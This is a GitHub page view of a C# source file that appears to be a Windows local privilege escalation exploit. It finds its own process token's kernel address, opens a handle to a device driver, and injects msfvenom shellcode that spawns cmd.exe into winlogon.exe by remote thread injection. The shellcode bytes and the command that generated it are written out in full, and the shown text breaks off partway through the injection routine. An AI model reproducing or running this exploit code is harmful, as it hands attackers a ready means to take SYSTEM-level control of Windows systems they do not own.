-
Notifications
You must be signed in to change notification settings - Fork 129
Expand file tree
/
Copy pathDebugInjectionVariant.cs
More file actions
876 lines (771 loc) · 35 KB
/
DebugInjectionVariant.cs
File metadata and controls
876 lines (771 loc) · 35 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Security.Principal;
namespace DebugInjectionVariant
{
class DebugInjectionVariant
{
// Windows Definition
// Windows Enum
enum AllocationProtectEnum : uint
{
PAGE_EXECUTE = 0x00000010,
PAGE_EXECUTE_READ = 0x00000020,
PAGE_EXECUTE_READWRITE = 0x00000040,
PAGE_EXECUTE_WRITECOPY = 0x00000080,
PAGE_NOACCESS = 0x00000001,
PAGE_READONLY = 0x00000002,
PAGE_READWRITE = 0x00000004,
PAGE_WRITECOPY = 0x00000008,
PAGE_GUARD = 0x00000100,
PAGE_NOCACHE = 0x00000200,
PAGE_WRITECOMBINE = 0x00000400
}
[Flags]
enum FormatMessageFlags : uint
{
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100,
FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200,
FORMAT_MESSAGE_FROM_STRING = 0x00000400,
FORMAT_MESSAGE_FROM_HMODULE = 0x00000800,
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000,
FORMAT_MESSAGE_ARGUMENT_ARRAY = 0x00002000
}
[Flags]
enum ProcessAccessFlags : uint
{
PROCESS_ALL_ACCESS = 0x001F0FFF,
Terminate = 0x00000001,
PROCESS_CREATE_THREAD = 0x00000002,
PROCESS_VM_OPERATION = 0x00000008,
PROCESS_VM_READ = 0x00000010,
PROCESS_VM_WRITE = 0x00000020,
PROCESS_DUP_HANDLE = 0x00000040,
PROCESS_CREATE_PROCESS = 0x000000080,
PROCESS_SET_QUOTA = 0x00000100,
PROCESS_SET_INFORMATION = 0x00000200,
PROCESS_QUERY_INFORMATION = 0x00000400,
PROCESS_QUERY_LIMITED_INFORMATION = 0x00001000,
SYNCHRONIZE = 0x00100000,
MAXIMUM_ALLOWED = 0x02000000
}
enum StateEnum : uint
{
MEM_COMMIT = 0x1000,
MEM_FREE = 0x10000,
MEM_RESERVE = 0x2000
}
enum SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation = 0x00,
SystemProcessorInformation = 0x01,
SystemPerformanceInformation = 0x02,
SystemTimeOfDayInformation = 0x03,
SystemPathInformation = 0x04,
SystemProcessInformation = 0x05,
SystemCallCountInformation = 0x06,
SystemDeviceInformation = 0x07,
SystemProcessorPerformanceInformation = 0x08,
SystemFlagsInformation = 0x09,
SystemCallTimeInformation = 0x0A,
SystemModuleInformation = 0x0B,
SystemLocksInformation = 0x0C,
SystemStackTraceInformation = 0x0D,
SystemPagedPoolInformation = 0x0E,
SystemNonPagedPoolInformation = 0x0F,
SystemHandleInformation = 0x10,
SystemObjectInformation = 0x11,
SystemPageFileInformation = 0x12,
SystemVdmInstemulInformation = 0x13,
SystemVdmBopInformation = 0x14,
SystemFileCacheInformation = 0x15,
SystemPoolTagInformation = 0x16,
SystemInterruptInformation = 0x17,
SystemDpcBehaviorInformation = 0x18,
SystemFullMemoryInformation = 0x19,
SystemLoadGdiDriverInformation = 0x1A,
SystemUnloadGdiDriverInformation = 0x1B,
SystemTimeAdjustmentInformation = 0x1C,
SystemSummaryMemoryInformation = 0x1D,
SystemMirrorMemoryInformation = 0x1E,
SystemPerformanceTraceInformation = 0x1F,
SystemObsolete0 = 0x20,
SystemExceptionInformation = 0x21,
SystemCrashDumpStateInformation = 0x22,
SystemKernelDebuggerInformation = 0x23,
SystemContextSwitchInformation = 0x24,
SystemRegistryQuotaInformation = 0x25,
SystemExtendServiceTableInformation = 0x26,
SystemPrioritySeperation = 0x27,
SystemVerifierAddDriverInformation = 0x28,
SystemVerifierRemoveDriverInformation = 0x29,
SystemProcessorIdleInformation = 0x2A,
SystemLegacyDriverInformation = 0x2B,
SystemCurrentTimeZoneInformation = 0x2C,
SystemLookasideInformation = 0x2D,
SystemTimeSlipNotification = 0x2E,
SystemSessionCreate = 0x2F,
SystemSessionDetach = 0x30,
SystemSessionInformation = 0x31,
SystemRangeStartInformation = 0x32,
SystemVerifierInformation = 0x33,
SystemVerifierThunkExtend = 0x34,
SystemSessionProcessInformation = 0x35,
SystemLoadGdiDriverInSystemSpace = 0x36,
SystemNumaProcessorMap = 0x37,
SystemPrefetcherInformation = 0x38,
SystemExtendedProcessInformation = 0x39,
SystemRecommendedSharedDataAlignment = 0x3A,
SystemComPlusPackage = 0x3B,
SystemNumaAvailableMemory = 0x3C,
SystemProcessorPowerInformation = 0x3D,
SystemEmulationBasicInformation = 0x3E,
SystemEmulationProcessorInformation = 0x3F,
SystemExtendedHandleInformation = 0x40,
SystemLostDelayedWriteInformation = 0x41,
SystemBigPoolInformation = 0x42,
SystemSessionPoolTagInformation = 0x43,
SystemSessionMappedViewInformation = 0x44,
SystemHotpatchInformation = 0x45,
SystemObjectSecurityMode = 0x46,
SystemWatchdogTimerHandler = 0x47,
SystemWatchdogTimerInformation = 0x48,
SystemLogicalProcessorInformation = 0x49,
SystemWow64SharedInformationObsolete = 0x4A,
SystemRegisterFirmwareTableInformationHandler = 0x4B,
SystemFirmwareTableInformation = 0x4C,
SystemModuleInformationEx = 0x4D,
SystemVerifierTriageInformation = 0x4E,
SystemSuperfetchInformation = 0x4F,
SystemMemoryListInformation = 0x50,
SystemFileCacheInformationEx = 0x51,
SystemThreadPriorityClientIdInformation = 0x52,
SystemProcessorIdleCycleTimeInformation = 0x53,
SystemVerifierCancellationInformation = 0x54,
SystemProcessorPowerInformationEx = 0x55,
SystemRefTraceInformation = 0x56,
SystemSpecialPoolInformation = 0x57,
SystemProcessIdInformation = 0x58,
SystemErrorPortInformation = 0x59,
SystemBootEnvironmentInformation = 0x5A,
SystemHypervisorInformation = 0x5B,
SystemVerifierInformationEx = 0x5C,
SystemTimeZoneInformation = 0x5D,
SystemImageFileExecutionOptionsInformation = 0x5E,
SystemCoverageInformation = 0x5F,
SystemPrefetchPatchInformation = 0x60,
SystemVerifierFaultsInformation = 0x61,
SystemSystemPartitionInformation = 0x62,
SystemSystemDiskInformation = 0x63,
SystemProcessorPerformanceDistribution = 0x64,
SystemNumaProximityNodeInformation = 0x65,
SystemDynamicTimeZoneInformation = 0x66,
SystemCodeIntegrityInformation = 0x67,
SystemProcessorMicrocodeUpdateInformation = 0x68,
SystemProcessorBrandString = 0x69,
SystemVirtualAddressInformation = 0x6A,
SystemLogicalProcessorAndGroupInformation = 0x6B,
SystemProcessorCycleTimeInformation = 0x6C,
SystemStoreInformation = 0x6D,
SystemRegistryAppendString = 0x6E,
SystemAitSamplingValue = 0x6F,
SystemVhdBootInformation = 0x70,
SystemCpuQuotaInformation = 0x71,
SystemNativeBasicInformation = 0x72,
SystemErrorPortTimeouts = 0x73,
SystemLowPriorityIoInformation = 0x74,
SystemBootEntropyInformation = 0x75,
SystemVerifierCountersInformation = 0x76,
SystemPagedPoolInformationEx = 0x77,
SystemSystemPtesInformationEx = 0x78,
SystemNodeDistanceInformation = 0x79,
SystemAcpiAuditInformation = 0x7A,
SystemBasicPerformanceInformation = 0x7B,
SystemQueryPerformanceCounterInformation = 0x7C,
SystemSessionBigPoolInformation = 0x7D,
SystemBootGraphicsInformation = 0x7E,
SystemScrubPhysicalMemoryInformation = 0x7F,
SystemBadPageInformation = 0x80,
SystemProcessorProfileControlArea = 0x81,
SystemCombinePhysicalMemoryInformation = 0x82,
SystemEntropyInterruptTimingInformation = 0x83,
SystemConsoleInformation = 0x84,
SystemPlatformBinaryInformation = 0x85,
SystemPolicyInformation = 0x86,
SystemHypervisorProcessorCountInformation = 0x87,
SystemDeviceDataInformation = 0x88,
SystemDeviceDataEnumerationInformation = 0x89,
SystemMemoryTopologyInformation = 0x8A,
SystemMemoryChannelInformation = 0x8B,
SystemBootLogoInformation = 0x8C,
SystemProcessorPerformanceInformationEx = 0x8D,
SystemCriticalProcessErrorLogInformation = 0x8E,
SystemSecureBootPolicyInformation = 0x8F,
SystemPageFileInformationEx = 0x90,
SystemSecureBootInformation = 0x91,
SystemEntropyInterruptTimingRawInformation = 0x92,
SystemPortableWorkspaceEfiLauncherInformation = 0x93,
SystemFullProcessInformation = 0x94,
SystemKernelDebuggerInformationEx = 0x95,
SystemBootMetadataInformation = 0x96,
SystemSoftRebootInformation = 0x97,
SystemElamCertificateInformation = 0x98,
SystemOfflineDumpConfigInformation = 0x99,
SystemProcessorFeaturesInformation = 0x9A,
SystemRegistryReconciliationInformation = 0x9B,
SystemEdidInformation = 0x9C,
SystemManufacturingInformation = 0x9D,
SystemEnergyEstimationConfigInformation = 0x9E,
SystemHypervisorDetailInformation = 0x9F,
SystemProcessorCycleStatsInformation = 0xA0,
SystemVmGenerationCountInformation = 0xA1,
SystemTrustedPlatformModuleInformation = 0xA2,
SystemKernelDebuggerFlags = 0xA3,
SystemCodeIntegrityPolicyInformation = 0xA4,
SystemIsolatedUserModeInformation = 0xA5,
SystemHardwareSecurityTestInterfaceResultsInformation = 0xA6,
SystemSingleModuleInformation = 0xA7,
SystemAllowedCpuSetsInformation = 0xA8,
SystemDmaProtectionInformation = 0xA9,
SystemInterruptCpuSetsInformation = 0xAA,
SystemSecureBootPolicyFullInformation = 0xAB,
SystemCodeIntegrityPolicyFullInformation = 0xAC,
SystemAffinitizedInterruptProcessorInformation = 0xAD,
SystemRootSiloInformation = 0xAE,
SystemCpuSetInformation = 0xAF,
SystemCpuSetTagInformation = 0xB0,
SystemWin32WerStartCallout = 0xB1,
SystemSecureKernelProfileInformation = 0xB2,
SystemCodeIntegrityPlatformManifestInformation = 0xB3,
SystemInterruptSteeringInformation = 0xB4,
SystemSuppportedProcessorArchitectures = 0xB5,
SystemMemoryUsageInformation = 0xB6,
SystemCodeIntegrityCertificateInformation = 0xB7,
SystemPhysicalMemoryInformation = 0xB8,
SystemControlFlowTransition = 0xB9,
SystemKernelDebuggingAllowed = 0xBA,
SystemActivityModerationExeState = 0xBB,
SystemActivityModerationUserSettings = 0xBC,
SystemCodeIntegrityPoliciesFullInformation = 0xBD,
SystemCodeIntegrityUnlockInformation = 0xBE,
SystemIntegrityQuotaInformation = 0xBF,
SystemFlushInformation = 0xC0,
SystemProcessorIdleMaskInformation = 0xC1,
SystemSecureDumpEncryptionInformation = 0xC2,
SystemWriteConstraintInformation = 0xC3,
SystemKernelVaShadowInformation = 0xC4,
SystemHypervisorSharedPageInformation = 0xC5,
SystemFirmwareBootPerformanceInformation = 0xC6,
SystemCodeIntegrityVerificationInformation = 0xC7,
SystemFirmwarePartitionInformation = 0xC8,
SystemSpeculationControlInformation = 0xC9,
SystemDmaGuardPolicyInformation = 0xCA,
SystemEnclaveLaunchControlInformation = 0xCB,
SystemWorkloadAllowedCpuSetsInformation = 0xCC,
SystemCodeIntegrityUnlockModeInformation = 0xCD,
SystemLeapSecondInformation = 0xCE,
SystemFlags2Information = 0xCF,
SystemSecurityModelInformation = 0xD0,
SystemCodeIntegritySyntheticCacheInformation = 0xD1,
MaxSystemInfoClass = 0xD2
}
[Flags]
enum TokenAccessFlags : uint
{
TOKEN_ADJUST_DEFAULT = 0x0080,
TOKEN_ADJUST_GROUPS = 0x0040,
TOKEN_ADJUST_PRIVILEGES = 0x0020,
TOKEN_ADJUST_SESSIONID = 0x0100,
TOKEN_ASSIGN_PRIMARY = 0x0001,
TOKEN_DUPLICATE = 0x0002,
TOKEN_EXECUTE = 0x00020000,
TOKEN_IMPERSONATE = 0x0004,
TOKEN_QUERY = 0x0008,
TOKEN_QUERY_SOURCE = 0x0010,
TOKEN_READ = 0x00020008,
TOKEN_WRITE = 0x000200E0,
TOKEN_ALL_ACCESS = 0x000F01FF,
MAXIMUM_ALLOWED = 0x02000000
}
// Windows Struct
[StructLayout(LayoutKind.Sequential, Pack = 1)]
struct SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
public IntPtr Object;
public IntPtr UniqueProcessId;
public IntPtr HandleValue;
public int GrantedAccess;
public short CreatorBackTraceIndex;
public short ObjectTypeIndex;
public int HandleAttributes;
public int Reserved;
}
// Windows API
/*
* advapi32.dll
*/
[DllImport("advapi32.dll", SetLastError = true)]
static extern bool OpenProcessToken(
IntPtr hProcess,
TokenAccessFlags DesiredAccess,
out IntPtr hToken);
/*
* kernel32.dll
*/
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
static extern IntPtr CreateFile(
string lpFileName,
FileAccess dwDesiredAccess,
FileShare dwShareMode,
IntPtr lpSecurityAttributes,
FileMode dwCreationDisposition,
FileAttributes dwFlagsAndAttributes,
IntPtr hTemplateFile);
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr CreateRemoteThread(
IntPtr hProcess,
IntPtr lpThreadAttributes,
int dwStackSize,
IntPtr lpStartAddress,
IntPtr lpParameter,
uint dwCreationFlags,
IntPtr lpThreadId);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool DeviceIoControl(
IntPtr hDevice,
uint dwIoControlCode,
IntPtr InBuffer,
int nInBufferSize,
IntPtr OutBuffer,
int nOutBufferSize,
IntPtr pBytesReturned,
IntPtr lpOverlapped);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
static extern int FormatMessage(
FormatMessageFlags dwFlags,
IntPtr lpSource,
int dwMessageId,
int dwLanguageId,
StringBuilder lpBuffer,
int nSize,
IntPtr Arguments);
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr OpenProcess(
ProcessAccessFlags processAccess,
bool bInheritHandle,
int processId);
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr VirtualAllocEx(
IntPtr hProcess,
IntPtr lpAddress,
int dwSize,
StateEnum flAllocationType,
AllocationProtectEnum flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
int dwSize,
AllocationProtectEnum flNewProtect,
IntPtr lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
int nSize,
ref int lpNumberOfBytesWritten);
/*
* ntdll.dll
*/
[DllImport("ntdll.dll", SetLastError = true)]
static extern int NtQuerySystemInformation(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
IntPtr SystemInformation,
int SystemInformationLength,
ref int ReturnLength);
// Windows Consts
const int STATUS_SUCCESS = 0;
static readonly int STATUS_INFO_LENGTH_MISMATCH = Convert.ToInt32("0xC0000004", 16);
static readonly IntPtr INVALID_HANDLE_VALUE = new IntPtr(-1);
// User define Consts
[Flags]
enum SepTokenPrivilegesFlags : ulong
{
CREATE_TOKEN = 0x0000000000000004UL, // SeCreateTokenPrivilege
ASSIGNPRIMARYTOKEN = 0x0000000000000008UL, // SeAssignPrimaryTokenPrivilege
LOCK_MEMORY = 0x0000000000000010UL, // SeLockMemoryPrivilege
INCREASE_QUOTA = 0x0000000000000020UL, // SeIncreaseQuotaPrivilege
MACHINE_ACCOUNT = 0x0000000000000040UL, // SeMachineAccountPrivilege
TCB = 0x0000000000000080UL, // SeTcbPrivilege
SECURITY = 0x0000000000000100UL, // SeSecurityPrivilege
TAKE_OWNERSHIP = 0x0000000000000200UL, // SeTakeOwnershipPrivilege
LOAD_DRIVER = 0x0000000000000400UL, // SeLoadDriverPrivilege
SYSTEM_PROFILE = 0x0000000000000800UL, // SeSystemProfilePrivilege
SYSTEMTIME = 0x0000000000001000UL, // SeSystemtimePrivilege
PROFILE_SINGLE_PROCESS = 0x0000000000002000UL, // SeProfileSingleProcessPrivilege
INCREASE_BASE_PRIORITY = 0x0000000000004000UL, // SeIncreaseBasePriorityPrivilege
CREATE_PAGEFILE = 0x0000000000008000UL, // SeCreatePagefilePrivilege
CREATE_PERMANENT = 0x0000000000010000UL, // SeCreatePermanentPrivilege
BACKUP = 0x0000000000020000UL, // SeBackupPrivilege
RESTORE = 0x0000000000040000UL, // SeRestorePrivilege
SHUTDOWN = 0x0000000000080000UL, // SeShutdownPrivilege
DEBUG = 0x0000000000100000UL, // SeDebugPrivilege
AUDIT = 0x0000000000200000UL, // SeAuditPrivilege
SYSTEM_ENVIRONMENT = 0x0000000000400000UL, // SeSystemEnvironmentPrivilege
CHANGE_NOTIFY = 0x0000000000800000UL, // SeChangeNotifyPrivilege
REMOTE_SHUTDOWN = 0x0000000001000000UL, // SeRemoteShutdownPrivilege
UNDOCK = 0x0000000002000000UL, // SeUndockPrivilege
SYNC_AGENT = 0x0000000004000000UL, // SeSyncAgentPrivilege
ENABLE_DELEGATION = 0x0000000008000000UL, // SeEnableDelegationPrivilege
MANAGE_VOLUME = 0x0000000010000000UL, // SeManageVolumePrivilege
IMPERSONATE = 0x0000000020000000UL, // SeImpersonatePrivilege
CREATE_GLOBAL = 0x0000000040000000UL, // SeCreateGlobalPrivilege
TRUSTED_CREDMAN_ACCESS = 0x0000000080000000UL, // SeTrustedCredManAccessPrivilege
RELABEL = 0x0000000100000000UL, // SeRelabelPrivilege
INCREASE_WORKING_SET = 0x0000000200000000UL, // SeIncreaseWorkingSetPrivilege
TIME_ZONE = 0x0000000400000000UL, // SeTimeZonePrivilege
CREATE_SYMBOLIC_LINK = 0x0000000800000000UL, // SeCreateSymbolicLinkPrivilege
DELEGATE_SESSION_USER_IMPERSONATE = 0x0000001000000000UL, // SeDelegateSessionUserImpersonatePrivilege
ALL = 0x0000001FFFFFFFFCUL
}
// User define functions
static IntPtr GetCurrentProcessTokenPointer()
{
int error;
int ntstatus;
var pObject = IntPtr.Zero;
if (!OpenProcessToken(
Process.GetCurrentProcess().Handle,
TokenAccessFlags.MAXIMUM_ALLOWED,
out IntPtr hToken))
{
error = Marshal.GetLastWin32Error();
Console.WriteLine("[-] Failed to open current process token.");
Console.WriteLine(" |-> {0}\n", GetWin32ErrorMessage(error, false));
return IntPtr.Zero;
}
Console.WriteLine("[+] Got a handle of current process token.");
Console.WriteLine(" |-> hToken: 0x{0}", hToken.ToString("X"));
Console.WriteLine("[>] Trying to retrieve system information.");
int systemInformationLength = 1024;
IntPtr infoBuffer;
do
{
infoBuffer = Marshal.AllocHGlobal(systemInformationLength);
ZeroMemory(infoBuffer, systemInformationLength);
ntstatus = NtQuerySystemInformation(
SYSTEM_INFORMATION_CLASS.SystemExtendedHandleInformation,
infoBuffer,
systemInformationLength,
ref systemInformationLength);
if (ntstatus != STATUS_SUCCESS)
Marshal.FreeHGlobal(infoBuffer);
} while (ntstatus == STATUS_INFO_LENGTH_MISMATCH);
CloseHandle(hToken);
if (ntstatus != STATUS_SUCCESS)
{
Console.WriteLine("[-] Failed to get system information.");
Console.WriteLine(" |-> {0}\n", GetWin32ErrorMessage(ntstatus, true));
return IntPtr.Zero;
}
var entryCount = Marshal.ReadInt32(infoBuffer);
Console.WriteLine("[+] Got {0} entries.", entryCount);
var pid = Process.GetCurrentProcess().Id;
var entry = new SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX();
var entrySize = Marshal.SizeOf(entry);
var pEntryOffset = new IntPtr(infoBuffer.ToInt64() + IntPtr.Size * 2);
IntPtr uniqueProcessId;
IntPtr handleValue;
Console.WriteLine("[>] Searching our process entry (PID = {0}).", pid);
for (var idx = 0; idx < entryCount; idx++)
{
entry = (SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX)Marshal.PtrToStructure(
pEntryOffset,
entry.GetType());
uniqueProcessId = entry.UniqueProcessId;
handleValue = entry.HandleValue;
if (uniqueProcessId == new IntPtr(pid) && handleValue == hToken)
{
pObject = entry.Object;
Console.WriteLine("[+] Got our entry.");
Console.WriteLine(" |-> Object: 0x{0}", pObject.ToString("X16"));
Console.WriteLine(" |-> UniqueProcessId: {0}", uniqueProcessId);
Console.WriteLine(" |-> HandleValue: 0x{0}", handleValue.ToString("X"));
break;
}
pEntryOffset = new IntPtr(pEntryOffset.ToInt64() + entrySize);
}
if (pObject == IntPtr.Zero)
Console.WriteLine("[-] Failed to get target entry.\n");
Marshal.FreeHGlobal(infoBuffer);
CloseHandle(hToken);
return pObject;
}
static IntPtr GetDeviceHandle(string deviceName)
{
int error;
Console.WriteLine("[>] Trying to open device driver.");
Console.WriteLine(" |-> Device Path : {0}", deviceName);
IntPtr hDevice = CreateFile(
deviceName,
FileAccess.ReadWrite,
FileShare.ReadWrite,
IntPtr.Zero,
FileMode.Open,
FileAttributes.Normal,
IntPtr.Zero);
if (hDevice == INVALID_HANDLE_VALUE)
{
error = Marshal.GetLastWin32Error();
Console.WriteLine("[-] Failed to get device handle.");
Console.WriteLine(" |-> {0}\n", GetWin32ErrorMessage(error, false));
return IntPtr.Zero;
}
Console.WriteLine("[+] Got a device handle.");
Console.WriteLine(" |-> hDevice: 0x{0}", hDevice.ToString("X"));
return hDevice;
}
static string GetWin32ErrorMessage(int code, bool isNtStatus)
{
int nReturnedLength;
ProcessModuleCollection modules;
FormatMessageFlags dwFlags;
int nSizeMesssage = 256;
var message = new StringBuilder(nSizeMesssage);
IntPtr pNtdll = IntPtr.Zero;
if (isNtStatus)
{
modules = Process.GetCurrentProcess().Modules;
foreach (ProcessModule mod in modules)
{
if (string.Compare(
Path.GetFileName(mod.FileName),
"ntdll.dll",
StringComparison.OrdinalIgnoreCase) == 0)
{
pNtdll = mod.BaseAddress;
break;
}
}
dwFlags = FormatMessageFlags.FORMAT_MESSAGE_FROM_HMODULE |
FormatMessageFlags.FORMAT_MESSAGE_FROM_SYSTEM;
}
else
{
dwFlags = FormatMessageFlags.FORMAT_MESSAGE_FROM_SYSTEM;
}
nReturnedLength = FormatMessage(
dwFlags,
pNtdll,
code,
0,
message,
nSizeMesssage,
IntPtr.Zero);
if (nReturnedLength == 0)
{
return string.Format("[ERROR] Code 0x{0}", code.ToString("X8"));
}
else
{
return string.Format(
"[ERROR] Code 0x{0} : {1}",
code.ToString("X8"),
message.ToString().Trim());
}
}
static bool InjectToWinlogon()
{
int error;
int winlogon;
// msfvenom -p windows/x64/exec cmd="cmd.exe" exitfunc=thread -a x64 --platform windows -f csharp
byte[] shellcode = new byte[] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x6d,0x64,
0x2e,0x65,0x78,0x65,0x00 };
Console.WriteLine("[>] Hunting winlogon PID.");
try
{
winlogon = (Process.GetProcessesByName("winlogon")[0]).Id;
}
catch
{
Console.WriteLine("[-] Failed to get process id of winlogon.");
return false;
}
Console.WriteLine("[>] Injecting shellcode to the winlogon process.");
Console.WriteLine(" |-> PID : {0}", winlogon);
var accessFlags = ProcessAccessFlags.PROCESS_CREATE_THREAD |
ProcessAccessFlags.PROCESS_VM_OPERATION |
ProcessAccessFlags.PROCESS_VM_WRITE;
IntPtr hProcess = OpenProcess(accessFlags, false, winlogon);
if (hProcess == IntPtr.Zero)
{
error = Marshal.GetLastWin32Error();
Console.WriteLine("[-] Failed to get a winlogon handle");
Console.WriteLine(" |-> {0}\n", GetWin32ErrorMessage(error, false));
return false;
}
IntPtr buffer = VirtualAllocEx(
hProcess,
IntPtr.Zero,
shellcode.Length,
StateEnum.MEM_COMMIT,
AllocationProtectEnum.PAGE_READWRITE);
if (buffer == IntPtr.Zero)
{
error = Marshal.GetLastWin32Error();
Console.WriteLine("[-] Failed to allocate memory.");
Console.WriteLine(" |-> {0}\n", GetWin32ErrorMessage(error, false));
CloseHandle(hProcess);
return false;
}
Console.WriteLine(
"[+] Shellcode buffer is allocated at 0x{0} in winlogon process.",
buffer.ToString("X16"));
int returnedBytes = 0;
if (!WriteProcessMemory(
hProcess,
buffer,
shellcode,
shellcode.Length,
ref returnedBytes))
{
error = Marshal.GetLastWin32Error();
Console.WriteLine("[-] Failed to write shellcode to winlogon.");
Console.WriteLine(" |-> {0}\n", GetWin32ErrorMessage(error, false));
CloseHandle(hProcess);
return false;
}
Console.WriteLine(
